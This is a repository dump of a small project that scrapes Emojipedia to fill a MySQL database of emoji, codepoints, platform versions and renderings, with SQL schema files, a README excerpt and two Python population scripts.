lists (i.e., when they come out with new emoji versions--I made the emoji versions list manually)\n\n\n## TO RUN\nOnce the database is set up, use `populatedb_emoji.py` to populate the emoji versions, codepoints, emoji characters, and emoji codepoint tables, then `populatedb_renderings.py` to populate the platforms, platform versions, and renderings tables. This second script also adds emoji and emoji-codepoints if emoji are found on the platform pages that have valid codepoints in the emoji data.\n\nNote: You may have to\n\n```\n> unset http_proxy\n> unset https_proxy\n```\n\nin the command line before scraping, perhaps if getting 'Unexpected EOF' errors\n\n\n## SQL OUTPUT\nThe python populate scripts create sql scripts to mimic the database insertions/updates that were performed. Therefore,these scripts (`insert_emoji.sql` and `insert_renderings.sql` in the database/data/ folder) can be used to populate the database without re-running the python scripts (re-scraping and collecting data) (much faster).\n\n\n## EMOJIPEDIA CODE CREDIT\nThe files in the emojipedia fodler (emoji.py and emojipedia.py) are slightly-modified copies from the [python-emojipedia package](https://github.com/bcongdon/python-emojipedia) (Copyright (c) 2016 Ben Congdon)\nI needed to make my own copies of these files rather than simply install and use the emojipedia python package (which I was doing, originally) because I ran into too many errors related to network noise.\n\nIn my own copies, I use request sessions with adapters configured for retries to handle network noise. I also added a property for the emoji's url extension (which we needed for identifying emoji in our rendering scraping algorithm from the platform version pages).\nAt this point in time, these are the only difference between my copies and their code base (9/12/17)\n\nAs of 2/20/18, I needed to make more changes: originally the \"all\" emoji emojipedia function used the emojipedia.org/emoji url, which was a page that listed all emoji in emojipedia along with their codepoints in a huge table. That page no longer seems to be live.\nBecause of this, I have now also added an all_emoji_by_version function that scrapes all of the emoji on a given version's page. I also modified the emoji codepoints code because I discovered a bug: the code was creating a list from creating a set, which was losing the proper order of the codepoints (which have to be in exactly the right order; a different order could identify a different emoji). I didn't run into this bug before because the previous all emoji function scraped the codepoints right off that page, but the emoji version pages don't list the codepoints the same way.\n\n"
},
{
"alpha_fraction": 0.7261273264884949,
"alphanum_fraction": 0.7347480058670044,
"avg_line_length": 33.29545593261719,
"blob_id": "0a6009774f7860fde5c617bd47874e8a17f54638",
"content_id": "45df386b1e6ea2d0303d080759124f18999442fa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1508,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 44,
"path": "/database/create_renderings.sql",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "DROP TABLE IF EXISTS renderings;\nDROP TABLE IF EXISTS platform_versions;\nDROP TABLE IF EXISTS platforms;\n\nCREATE TABLE IF NOT EXISTS platforms (\n platform_id TINYINT NOT NULL AUTO_INCREMENT,\n platform_name VARCHAR(20) NOT NULL UNIQUE,\n platform_display_name VARCHAR(20),\n PRIMARY KEY (platform_id)\n);\n\nCREATE TABLE IF NOT EXISTS platform_versions (\n platform_version_id SMALLINT NOT NULL AUTO_INCREMENT,\n platform_id TINYINT,\n version_name VARCHAR(50) NOT NULL UNIQUE,\n version_display_name VARCHAR(50),\n release_date DATE DEFAULT NULL,\n in_use BOOLEAN,\n emojipedia_url_ext VARCHAR(50),\n prev_version_id SMALLINT,\n post_version_id SMALLINT,\n num_emoji SMALLINT,\n num_changed_emoji SMALLINT,\n num_new_emoji SMALLINT,\n num_removed_emoji SMALLINT,\n PRIMARY KEY (platform_version_id),\n FOREIGN KEY (platform_id) REFERENCES platforms(platform_id),\n FOREIGN KEY (prev_version_id) REFERENCES platform_versions(platform_version_id),\n FOREIGN KEY (post_version_id) REFERENCES platform_versions(platform_version_id)\n);\n\nCREATE TABLE IF NOT EXISTS renderings (\n rendering_id MEDIUMINT NOT NULL AUTO_INCREMENT,\n emoji_id SMALLINT,\n platform_version_id SMALLINT,\n display_url VARCHAR(250),\n is_new BOOLEAN DEFAULT NULL,\n is_changed BOOLEAN DEFAULT NULL,\n PRIMARY KEY (rendering_id),\n FOREIGN KEY (emoji_id) REFERENCES emoji(emoji_id),\n FOREIGN KEY (platform_version_id) REFERENCES platform_versions(platform_version_id)\n);\n\nCOMMIT;"
},
{
"alpha_fraction": 0.5699784755706787,
"alphanum_fraction": 0.5739772319793701,
"avg_line_length": 45.894229888916016,
"blob_id": "cd9deb9dd83b17c832224104d0d24fce4ae39b74",
"content_id": "94ced54e1d225c09ccde91d903d8f6457fa7036b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9754,
"license_type": "permissive",
"max_line_length": 252,
"num_lines": 208,
"path": "/populatedb_emoji.py",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "import mysql.connector\nfrom local_config import db_config\nfrom emojipedia.emojipedia import Emojipedia,EMOJI_CATEGORIES\nfrom emoji_data import Unicode_Emoji_Data\n\n# Connect to the database\ncnx = mysql.connector.connect(user=db_config['user'],\n host=db_config['host'],\n password=db_config['password'],\n database=db_config['database'],\n use_unicode=True)\ncursor = cnx.cursor()\n# Enforce UTF-8 for the connection.\ncursor.execute('SET NAMES utf8mb4')\ncursor.execute(\"SET CHARACTER SET utf8mb4\")\ncursor.execute(\"SET character_set_connection=utf8mb4\")\n\n# Write all data definition queries to a file to be able to recreate the database without scraping\nwith open('database/data/insert_emoji.sql','w', encoding='utf-8') as db_file:\n\n # -------- EMOJI VERSIONS --------\n print(\"Inserting EMOJI VERSIONS\")\n insert_emoji_version_query = (\"INSERT INTO emoji_versions \"\n \"(emoji_version_id,emoji_version,emoji_version_name,emojipedia_url_ext) \"\n \"VALUES (%(id)s, %(version)s, %(name)s, %(url)s);\")\n emoji_version_list = []\n num_versions = len(Unicode_Emoji_Data.EMOJI_VERSIONS)\n emoji_version_index = 1\n for i in range(0,num_versions):\n version,name = Unicode_Emoji_Data.EMOJI_VERSIONS[i]\n version_url_ext = name.replace(' ','-').lower()\n cur_dict = {'id':emoji_version_index,\n 'version':version,\n 'name':name,\n 'url':version_url_ext}\n emoji_version_list.append(cur_dict)\n cursor.execute(insert_emoji_version_query,cur_dict)\n print(cursor.statement,file=db_file)\n\n emoji_version_index += 1\n print(file=db_file)\n cnx.commit()\n print(\"- Completed -\")\n print()\n\n # -------- CODEPOINTS --------\n print(\"Inserting CODEPOINTS\")\n insert_codepoint_query = (\"INSERT INTO codepoints \"\n \"(codepoint_id,codepoint,isComponent,isModifier,isModifierBase) \"\n \"VALUES (%(id)s, %(codepoint)s, %(isComponent)s, %(isModifier)s, %(isModifierBase)s);\")\n codepoint_dict = {}\n codepoint_index = 1\n for codepoint in Unicode_Emoji_Data.EMOJI:\n isComponent = codepoint in Unicode_Emoji_Data.EMOJI_COMPONENTS\n isModifier = codepoint in Unicode_Emoji_Data.EMOJI_MODIFIERS\n isModifierBase = codepoint in Unicode_Emoji_Data.EMOJI_MODIFIER_BASES\n cur_dict = {'id':codepoint_index,\n 'codepoint':codepoint,\n 'isComponent':isComponent,\n 'isModifier':isModifier,\n 'isModifierBase':isModifierBase}\n codepoint_dict[codepoint] = cur_dict\n cursor.execute(insert_codepoint_query,cur_dict)\n print(cursor.statement,file=db_file)\n codepoint_index += 1\n for codepoint in Unicode_Emoji_Data.EMOJI_COMPONENTS:\n if codepoint not in codepoint_dict:\n isModifier = codepoint in Unicode_Emoji_Data.EMOJI_MODIFIERS\n isModifierBase = codepoint in Unicode_Emoji_Data.EMOJI_MODIFIER_BASES\n cur_dict = {'id':codepoint_index,\n 'codepoint':codepoint,\n 'isComponent':True,\n 'isModifier':isModifier,\n 'isModifierBase':isModifierBase}\n codepoint_dict[codepoint] = cur_dict\n cursor.execute(insert_codepoint_query,cur_dict)\n print(cursor.statement,file=db_file)\n codepoint_index += 1\n\n print(file=db_file)\n cnx.commit()\n print(\"- Completed -\")\n print()\n\n\n # -------- EMOJI & EMOJI CODEPOINTS --------\n print('Creating emoji category dictionary')\n # Create Emojipedia emoji category dictionary\n emoji_category_dict = {}\n category_count = {}\n for category in EMOJI_CATEGORIES:\n category_emoji = Emojipedia.category(category)\n #print(category,\": \",len(category_emoji))\n category_count[category] = {'count':0, 'total':len(category_emoji)}\n for emoji in category_emoji:\n emoji_category_dict[emoji.title] = category\n print('- Completed -')\n print()\n\n print('Getting complete list of emoji (from emoji version pages)')\n # Get all the emoji\n emoji_lists = []\n for emoji_version in emoji_version_list:\n emojis = Emojipedia.all_by_emoji_version(emoji_version[\"url\"])\n print('Num emoji in version {0}: {1}'.format(emoji_version[\"name\"],len(emojis)))\n emoji_lists.append((emoji_version[\"id\"], emojis))\n print('- Completed -')\n print()\n\n\n print('Inserting EMOJI & EMOJI CODEPOINTS')\n insert_emoji_query = (\"INSERT INTO emoji \"\n \"(emoji_id,emoji_version_id,emoji_name,emoji_character,emojipedia_url_ext,emojipedia_category,codepoint_string,num_codepoints,hasComponent,hasModifier,hasModifierBase,appearance_differs_flag,unicode_not_recommended) \"\n \"VALUES (%(id)s, %(version_id)s, %(name)s, %(character)s, %(url)s, %(category)s, %(codepoint_string)s, %(num_codepoints)s, %(hasComponent)s, %(hasModifier)s, %(hasModifierBase)s, %(appearance_differs)s, %(not_recommended)s);\")\n\n insert_emoji_codepoint_query = (\"INSERT INTO emoji_codepoints \"\n \"(emoji_codepoint_id,emoji_id,codepoint_id,sequence_index) \"\n \"VALUES (%(id)s, %(emoji_id)s, %(codepoint_id)s, %(sequence_index)s);\")\n\n emoji_counts_dict = {}\n emoji_index = 1\n emoji_codepoint_index = 1\n for emoji_version_id,emojis in emoji_lists:\n for emoji in emojis:\n # if emoji_index > 20:\n # break\n\n hasComponent = False\n hasModifier = False\n hasModifierBase = False\n emoji_codepoint_list = []\n sequence = 1\n is_emoji = True\n for codepoint_U in emoji.codepoints:\n codepoint = codepoint_U[2:] # codepoints are pre-pended with U+\n cur_codepoint_dict = codepoint_dict.get(codepoint,None)\n if cur_codepoint_dict is None:\n is_emoji = False\n break\n hasComponent = hasComponent or cur_codepoint_dict['isComponent']\n hasModifier = hasModifier or cur_codepoint_dict['isModifier']\n hasModifierBase = hasModifierBase or cur_codepoint_dict['isModifierBase']\n\n emoji_codepoint_list.append({'id':emoji_codepoint_index,\n 'emoji_id':emoji_index,\n 'codepoint_id':cur_codepoint_dict['id'],\n 'sequence_index':sequence})\n emoji_codepoint_index += 1\n sequence += 1\n if not is_emoji:\n print('skipping {0}, not an emoji'.format(emoji.title))\n print('-- skipping {0}, not an emoji'.format(emoji.title),file=db_file)\n continue\n\n url = emoji.url.strip('/')\n\n emoji_category = None\n if emoji.title in emoji_category_dict:\n emoji_category = emoji_category_dict[emoji.title]\n category_count[emoji_category]['count'] += 1\n\n # Codepoint String = straight string of codepoints: U+###U+#### (to extract, .split('U+'))\n codepoint_string = ''.join(emoji.codepoints)\n\n # Description flags for appearance differing across platforms or not being recommended by the Unicode\n description = emoji.description\n appearance_differs = True if \"Appearance differs greatly cross-platform.\" in description else False\n not_recommended = True if \"has not been recommended by Unicode.\" in description else False\n if not not_recommended:\n not_recommended = True if \"has not been Recommended For General Interchange (RGI) by Unicode.\" in description else False\n\n cur_dict = {'id':emoji_index,\n 'version_id':emoji_version_id,\n 'name':emoji.title,\n 'character':emoji.character,\n 'url':url,\n 'category':emoji_category,\n #'raw_character':emoji.character,\n 'codepoint_string':codepoint_string,\n 'num_codepoints':len(emoji.codepoints),\n 'hasComponent':hasComponent,\n 'hasModifier':hasModifier,\n 'hasModifierBase':hasModifierBase,\n 'appearance_differs':appearance_differs,\n 'not_recommended':not_recommended}\n emoji_counts_dict[url] = {'id':emoji_index,\n 'platforms':[],\n 'num_renderings':0,\n 'num_changed_renderings':0}\n\n cursor.execute(insert_emoji_query,cur_dict)\n print(cursor.statement,file=db_file)\n cursor.executemany(insert_emoji_codepoint_query,emoji_codepoint_list)\n print(cursor.statement,file=db_file)\n print(file=db_file)\n if emoji_index % 50 == 0:\n print('completed 50 emoji ({0} total so far)'.format(emoji_index))\n emoji_index += 1\n\n cnx.commit()\n print('- Completed - ({0} emoji inserted)'.format(emoji_index-1))\n print()\n\n for category in EMOJI_CATEGORIES:\n print(\"for category \",category,\", found: \",category_count[category]['count'],\" out of \",category_count[category]['total'])\n print()\n\ncnx.close()"
},
{
"alpha_fraction": 0.8271604776382446,
"alphanum_fraction": 0.8271604776382446,
"avg_line_length": 15.199999809265137,
"blob_id": "cc86b9a3e603a25d60f2c37ca2b4bc59839f3bb9",
"content_id": "45e41e295e5707e3e8ea2a7744f22df230bc35b9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 81,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 5,
"path": "/database/setup_db.sql",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "source dropall.sql\nsource create_emoji.sql\nsource create_renderings.sql\n\nCOMMIT;\n"
},
{
"alpha_fraction": 0.5565624237060547,
"alphanum_fraction": 0.5599976181983948,
"avg_line_length": 47.517242431640625,
"blob_id": "05ca23501d82e0f1e9bb08e8381a7d1e4f849c12",
"content_id": "c3348124917351356b140d8eef07da46f18dee3f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16885,
"license_type": "permissive",
"max_line_length": 217,
"num_lines": 348,
"path": "/populatedb_renderings.py",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "import dateparser\nimport mysql.connector\nfrom local_config import db_config\nfrom emojipedia.emojipedia import Emojipedia,Emoji\nfrom emoji_data import PLATFORMS,PLATFORM_VERSIONS,PLATFORM_VERSION_URL_MISMATCH\n\n# Connect to the database\ncnx = mysql.connector.connect(user=db_config['user'],\n host=db_config['host'],\n password=db_config['password'],\n database=db_config['database'])\ncursor = cnx.cursor()\n# Enforce UTF-8 for the connection.\ncursor.execute('SET NAMES utf8mb4')\ncursor.execute(\"SET CHARACTER SET utf8mb4\")\ncursor.execute(\"SET character_set_connection=utf8mb4\")\n\n# Write all data definition queries to a file to be able to recreate the database without scraping\nwith open('database/data/insert_renderings.sql','w', encoding='utf-8') as db_file:\n\n print(\"Inserting PLATFORMS\")\n # -------- PLATFORMS --------\n insert_platform_query = (\"INSERT INTO platforms \"\n \"(platform_id,platform_name,platform_display_name) \"\n \"VALUES (%(id)s, %(name)s, %(display_name)s);\")\n platform_dict = {}\n platform_index = 1\n for (platform,platform_display_name) in PLATFORMS:\n cur_dict = {'id':platform_index,'name':platform,'display_name':platform_display_name}\n platform_dict[platform] = cur_dict\n cursor.execute(insert_platform_query,cur_dict)\n print(cursor.statement,file=db_file)\n platform_index += 1\n\n print(file=db_file)\n cnx.commit()\n print(\"- Completed -\")\n print()\n\n\n # -------- PLATFORM VERSIONS --------\n print(\"Inserting PLATFORM VERSIONS\")\n insert_platform_version_query = (\"INSERT INTO platform_versions \"\n \"(platform_version_id,platform_id,version_name,version_display_name,in_use,emojipedia_url_ext,post_version_id) \"\n \"VALUES (%(id)s, %(platform_id)s, %(name)s, %(display_name)s, %(in_use)s, %(url)s, %(post_version_id)s);\")\n platform_version_list = []\n last_looked_at_platform = None\n num_versions = len(PLATFORM_VERSIONS)\n platform_version_index = 1\n for i in range(0,num_versions):\n version,display_name,in_use = PLATFORM_VERSIONS[i]\n version_split = version.split(' ')\n\n platform = version_split[0].lower()\n version_name = ' '.join(version_split[1:])\n if version in PLATFORM_VERSION_URL_MISMATCH:\n version_name = ' '.join(PLATFORM_VERSION_URL_MISMATCH[version].split(' ')[1:])\n version_url_ext = ('-'.join(version_split[1:])).lower()\n\n # The list is ordered from most recent to least recent\n # so if the last looked at platform in the list is for the same platform,\n # then the last looked at platform is the \"post version\" of the version\n # we are currently looking at\n post_platform_index = None\n if platform == last_looked_at_platform:\n post_platform_index = platform_version_index - 1\n last_looked_at_platform = platform\n\n # likewise, the next version to look at in the list is the \"previous version\"\n # of the version we are currently looking at,\n # unless it is for a different platform, in which the current version is the oldest version\n # or unless the version we are currently looking at is the last version in the list,\n # also making it the oldest version\n prev_platform_index = platform_version_index + 1\n if (platform_version_index < num_versions-1 and \\\n not PLATFORM_VERSIONS[i+1][0].startswith(version_split[0])) \\\n or (platform_version_index == num_versions):\n prev_platform_index = None\n\n cur_dict = {'id':platform_version_index,\n 'platform':platform,\n 'platform_id':platform_dict[platform]['id'],\n 'name':version_name,\n 'display_name':display_name,\n 'in_use':in_use,\n 'url':platform+'/'+version_url_ext,\n 'prev_version_id':prev_platform_index,\n 'post_version_id':post_platform_index}\n platform_version_list.append(cur_dict)\n cursor.execute(insert_platform_version_query,cur_dict)\n print(cursor.statement,file=db_file)\n\n platform_version_index += 1\n\n print(file=db_file)\n cnx.commit()\n print(\"- Completed -\")\n print()\n\n\n # -------- POPULATE EMOJI DICTIONARY FROM DATABASE\n print(\"Getting EMOJI from database\")\n emoji_counts_dict = {}\n emoji_dict_query = \"SELECT emoji_id,emojipedia_url_ext FROM emoji ORDER BY emoji_id;\"\n cursor.execute(emoji_dict_query)\n emoji_index = None\n for id,url in cursor:\n emoji_index = id\n emoji_counts_dict[url] = {'id':id,\n 'platforms':[],\n 'num_renderings':0,\n 'num_changed_renderings':0}\n emoji_index += 1\n print(\"Next inserted emoji at: {0}\".format(emoji_index))\n print(\"- Completed -\")\n print()\n\n\n # -------- POPULATE CODE POINT DICTIONARY FROM DATABASE\n print(\"Getting CODE POINTS from database\")\n codepoint_dict = {}\n codepoint_dict_query = \"SELECT codepoint_id,codepoint,isComponent,isModifier,isModifierBase FROM codepoints ORDER BY codepoint_id;\"\n cursor.execute(codepoint_dict_query)\n for id,codepoint,isComponent,isModifier,isModifierBase in cursor:\n cur_dict = {'id':id,\n 'codepoint':codepoint,\n 'isComponent':True,\n 'isModifier':isModifier,\n 'isModifierBase':isModifierBase}\n codepoint_dict[codepoint] = cur_dict\n emoji_codepoint_index_query = \"SELECT MAX(emoji_codepoint_id)+1 FROM emoji_codepoints;\"\n cursor.execute(emoji_codepoint_index_query)\n emoji_codepoint_index = cursor.fetchone()[0]\n print(\"Next inserted emoji codepoint at: {0}\".format(emoji_codepoint_index))\n print(\"- Completed -\")\n print()\n\n\n # -------- RENDERINGS & rest of PLATFORM VERSIONS --------\n print('Inserting RENDERINGS & Updating rest of PLATFORM VERSIONS')\n insert_rendering_query = (\"INSERT INTO renderings \"\n \"(rendering_id,emoji_id,platform_version_id,display_url,is_new,is_changed) \"\n \"VALUES (%(id)s, %(emoji_id)s, %(platform_version_id)s, %(display_url)s, %(isNew)s, %(isChanged)s);\")\n\n update_platform_version_query = (\"UPDATE platform_versions SET \"\n \"prev_version_id = %(prev_version_id)s, \"\n \"release_date = %(release_date)s, \"\n \"num_emoji = %(num_emoji)s, \"\n \"num_changed_emoji = %(num_changed)s, \"\n \"num_new_emoji = %(num_new)s, \"\n \"num_removed_emoji = %(num_removed)s \"\n \"WHERE platform_version_id = %(id)s;\")\n\n insert_emoji_query = (\"INSERT INTO emoji \"\n \"(emoji_id,emoji_name,emoji_character,emojipedia_url_ext,codepoint_string,num_codepoints,hasComponent,hasModifier,hasModifierBase,appearance_differs_flag,unicode_not_recommended) \"\n \"VALUES (%(id)s, %(name)s, %(char)s, %(url)s, %(codepoint_string)s, %(num_codepoints)s, %(hasComponent)s, %(hasModifier)s, %(hasModifierBase)s, %(appearance_differs)s, %(not_recommended)s);\")\n\n insert_emoji_codepoint_query = (\"INSERT INTO emoji_codepoints \"\n \"(emoji_codepoint_id,emoji_id,codepoint_id,sequence_index) \"\n \"VALUES (%(id)s, %(emoji_id)s, %(codepoint_id)s, %(sequence_index)s);\")\n\n rendering_index = 1\n emoji_to_skip = []\n for platform_version in platform_version_list:\n print('renderings and updating {0}'.format(platform_version['name']))\n # First, build lists of changed emoji and new emoji\n # get changed emoji\n soup = Emojipedia._get_page(platform_version['url']+'/changed')\n emoji_list = soup.find('ul', {'class': 'emoji-grid'})\n changed_emoji_list = []\n for emoji_entry in emoji_list.find_all('li'):\n # extract emoji url and then find associated emoji\n emoji_url = emoji_entry.findNext('a')['href'].rstrip('/')\n emoji_url_ext = emoji_url[(emoji_url.rindex('/')+1):]\n cur_dict = emoji_counts_dict.get(emoji_url_ext,None)\n if cur_dict:\n cur_dict['num_changed_renderings'] += 1\n changed_emoji_list.append(emoji_url_ext)\n platform_version['num_changed'] = len(changed_emoji_list)\n\n # get new emoji\n soup = Emojipedia._get_page(platform_version['url']+'/new')\n emoji_list = soup.find('ul', {'class': 'emoji-grid'})\n new_emoji_list = []\n for emoji_entry in emoji_list.find_all('li'):\n # extract emoji url and then find associated emoji\n emoji_url = emoji_entry.findNext('a')['href'].rstrip('/')\n emoji_url_ext = emoji_url[(emoji_url.rindex('/')+1):]\n new_emoji_list.append(emoji_url_ext)\n platform_version['num_new'] = len(new_emoji_list)\n\n # get removed emoji\n soup = Emojipedia._get_page(platform_version['url']+'/removed')\n emoji_list = soup.find('ul', {'class': 'emoji-grid'})\n platform_version['num_removed'] = len(emoji_list.find_all('li'))\n\n # Now, get the version page and get all the renderings\n soup = Emojipedia._get_page(platform_version['url'])\n emoji_list = soup.find('ul', {'class': 'emoji-grid'})\n num_emoji = 0\n for emoji_entry in emoji_list.find_all('li'):\n # extract emoji url and then find associated emoji\n emoji_url = emoji_entry.findNext('a')['href'].rstrip('/')\n emoji_url_ext = emoji_url[(emoji_url.rindex('/')+1):]\n\n # update emoji counts\n counts_dict = emoji_counts_dict.get(emoji_url_ext,None)\n if counts_dict is None:\n if emoji_url_ext in emoji_to_skip:\n print('skipping {0} again'.format(emoji_url_ext))\n print('-- skipping {0} again'.format(emoji_url_ext),file=db_file)\n num_emoji += 1\n continue\n\n # Emoji not found in dictionary, create emoji and emoji_codepoints if codepoints exist for emoji\n hasComponent = False\n hasModifier = False\n hasModifierBase = False\n emoji_codepoint_list = []\n sequence = 1\n is_emoji = True\n new_emoji = Emoji(url='/'+emoji_url_ext)\n for codepoint_U in new_emoji.codepoints:\n codepoint = codepoint_U[2:] # codepoints are pre-pended with U+\n cur_codepoint_dict = codepoint_dict.get(codepoint,None)\n if cur_codepoint_dict is None:\n is_emoji = False\n break\n hasComponent = hasComponent or cur_codepoint_dict['isComponent']\n hasModifier = hasModifier or cur_codepoint_dict['isModifier']\n hasModifierBase = hasModifierBase or cur_codepoint_dict['isModifierBase']\n\n emoji_codepoint_list.append({'id':emoji_codepoint_index,\n 'emoji_id':emoji_index,\n 'codepoint_id':cur_codepoint_dict['id'],\n 'sequence_index':sequence})\n emoji_codepoint_index += 1\n sequence += 1\n if not is_emoji:\n emoji_to_skip.append(emoji_url_ext)\n print(file=db_file)\n print('skipping {0}, codepoint(s) not in emoji data: {1}'.format(emoji_url_ext,new_emoji.codepoints))\n print('-- skipping {0}, codepoint(s) not in emoji data: {1}'.format(emoji_url_ext,new_emoji.codepoints),file=db_file)\n print(file=db_file)\n num_emoji += 1\n continue\n\n # Codepoint String = straight string of codepoints: U+###U+#### (to extract, .split('U+'))\n codepoint_string = ''.join(new_emoji.codepoints)\n\n # Description flags for appearance differing across platforms or not being recommended by the Unicode\n description = new_emoji.description\n appearance_differs = True if \"Appearance differs greatly cross-platform.\" in description else False\n not_recommended = True if \"has not been recommended by Unicode.\" in description else False\n if not not_recommended:\n not_recommended = True if \"has not been Recommended For General Interchange (RGI) by Unicode.\" in description else False\n\n cur_dict = {'id':emoji_index,\n 'name':new_emoji.title,\n 'char':new_emoji.character,\n 'url':emoji_url_ext,\n #'raw_character':emoji.character,\n 'codepoint_string':codepoint_string,\n 'num_codepoints':len(new_emoji.codepoints),\n 'hasComponent':hasComponent,\n 'hasModifier':hasModifier,\n 'hasModifierBase':hasModifierBase,\n 'appearance_differs':appearance_differs,\n 'not_recommended':not_recommended}\n counts_dict = {'id':emoji_index,\n 'platforms':[],\n 'num_renderings':0,\n 'num_changed_renderings':1}\n emoji_counts_dict[emoji_url_ext] = counts_dict\n\n print(file=db_file)\n cursor.execute(insert_emoji_query,cur_dict)\n print(cursor.statement,file=db_file)\n cursor.executemany(insert_emoji_codepoint_query,emoji_codepoint_list)\n print(cursor.statement,file=db_file)\n print(file=db_file)\n\n emoji_index += 1\n\n\n emoji_id = counts_dict['id']\n\n counts_dict['num_renderings'] += 1\n if platform_version['platform'] not in counts_dict['platforms']:\n counts_dict['platforms'].append(platform_version['platform'])\n\n # get image display url from the img src\n img_src = emoji_entry.findNext('img')['src']\n if img_src.endswith('lazy.svg'):\n img_src = emoji_entry.findNext('img')['data-src']\n\n isNew = emoji_url_ext in new_emoji_list\n isChanged = emoji_url_ext in changed_emoji_list\n\n # create the rendering, map by platform version id and emoji id\n rendering_dict = {'id':rendering_index,\n 'emoji_id':emoji_id,\n 'platform_version_id':platform_version['id'],\n 'display_url':img_src,\n 'isNew':isNew,\n 'isChanged':isChanged}\n cursor.execute(insert_rendering_query,rendering_dict)\n print(cursor.statement,file=db_file)\n\n rendering_index += 1\n num_emoji += 1\n # if num_emoji > 5:\n # break\n\n # Update platform version\n platform_version['num_emoji'] = num_emoji\n release_date_text = soup.find('div', {'class': 'content'}).findNext('ul').findNext('li').findNext('li').findNext('li').text[14:]\n release_date = dateparser.parse(release_date_text)\n platform_version['release_date'] = release_date.date()\n cursor.execute(update_platform_version_query,platform_version)\n print(cursor.statement,file=db_file)\n\n print(file=db_file)\n cnx.commit()\n print('- Completed -')\n print()\n\n\n # -------- rest of EMOJI --------\n print('Updating EMOJI counts')\n update_emoji_query = (\"UPDATE emoji SET \"\n \"num_platforms_support = %(num_platforms)s, \"\n \"num_changed_renderings = %(num_changed_renderings)s, \"\n \"num_renderings = %(num_renderings)s \"\n \"WHERE emoji_id = %(id)s;\")\n for counts in emoji_counts_dict.values():\n plat_list = counts.pop('platforms')\n counts['num_platforms'] = len(plat_list)\n cursor.execute(update_emoji_query,counts)\n print(cursor.statement,file=db_file)\n\n cnx.commit()\n print('- Completed -')\n\n print(file=db_file)\n print('COMMIT;',file=db_file)\n\n cnx.close()\n"
},
{
"alpha_fraction": 0.7267045378684998,
"alphanum_fraction": 0.738068163394928,
"avg_line_length": 31.61111068725586,
"blob_id": "d680926032498d549e01914e30d5634108e263d8",
"content_id": "aaf06e89b3a19e66f1cd723c0f38ab7d9e76a927",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1760,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 54,
"path": "/database/create_emoji.sql",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "DROP TABLE IF EXISTS emoji_codepoints;\nDROP TABLE IF EXISTS codepoints;\nDROP TABLE IF EXISTS emoji;\nDROP TABLE IF EXISTS emoji_versions;\n\nCREATE TABLE IF NOT EXISTS emoji_versions (\n emoji_version_id TINYINT NOT NULL AUTO_INCREMENT,\n emoji_version DECIMAL(2,1) UNIQUE NOT NULL,\n emoji_version_name VARCHAR(20),\n emojipedia_url_ext VARCHAR(20),\n PRIMARY KEY (emoji_version_id)\n);\n\nCREATE TABLE IF NOT EXISTS emoji (\n emoji_id SMALLINT NOT NULL AUTO_INCREMENT,\n emoji_name VARCHAR(150),\n emoji_character VARCHAR(30),\n emojipedia_url_ext VARCHAR(150) UNIQUE,\n emojipedia_category VARCHAR(50),\n codepoint_string VARCHAR(150) UNIQUE,\n num_codepoints TINYINT,\n num_platforms_support TINYINT,\n num_renderings TINYINT,\n num_changed_renderings TINYINT,\n hasComponent BOOLEAN DEFAULT NULL,\n hasModifier BOOLEAN DEFAULT NULL,\n hasModifierBase BOOLEAN DEFAULT NULL,\n appearance_differs_flag BOOLEAN,\n unicode_not_recommended BOOLEAN,\n emoji_version_id TINYINT,\n PRIMARY KEY (emoji_id),\n FOREIGN KEY (emoji_version_id) REFERENCES emoji_versions(emoji_version_id)\n);\n\nCREATE TABLE IF NOT EXISTS codepoints (\n codepoint_id SMALLINT NOT NULL AUTO_INCREMENT,\n codepoint VARCHAR(7) NOT NULL UNIQUE,\n isComponent BOOLEAN DEFAULT NULL,\n isModifier BOOLEAN DEFAULT NULL,\n isModifierBase BOOLEAN DEFAULT NULL,\n PRIMARY KEY (codepoint_id)\n);\n\nCREATE TABLE IF NOT EXISTS emoji_codepoints (\n emoji_codepoint_id MEDIUMINT NOT NULL AUTO_INCREMENT,\n emoji_id SMALLINT,\n codepoint_id SMALLINT,\n sequence_index TINYINT,\n PRIMARY KEY (emoji_codepoint_id),\n FOREIGN KEY (emoji_id) REFERENCES emoji(emoji_id),\n FOREIGN KEY (codepoint_id) REFERENCES codepoints(codepoint_id)\n);\n\nCOMMIT;"
},
{
"alpha_fraction": 0.8087649345397949,
"alphanum_fraction": 0.8087649345397949,
"avg_line_length": 24.200000762939453,
"blob_id": "0515a20cee3feec51143b4898be7d66dd46839db",
"content_id": "917a882b0b214b97c3210097b282d37bb0ab0edc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 251,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 10,
"path": "/database/dropall.sql",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "DROP TABLE IF EXISTS renderings;\nDROP TABLE IF EXISTS platform_versions;\nDROP TABLE IF EXISTS platforms;\n\nDROP TABLE IF EXISTS emoji_codepoints;\nDROP TABLE IF EXISTS codepoints;\nDROP TABLE IF EXISTS emoji;\nDROP TABLE IF EXISTS emoji_versions;\n\nCOMMIT;"
}
] | 8 |
aurbac/aws-summary
|
https://github.com/aurbac/aws-summary
|
cc0e92cea52a7edb6220751e2992a92e0d35b3a5
|
25f91eb20f83e78c51719aa6ed50716d6c208f63
|
52644a7800e378cc72db721521d76908cbef4f76
|
refs/heads/master
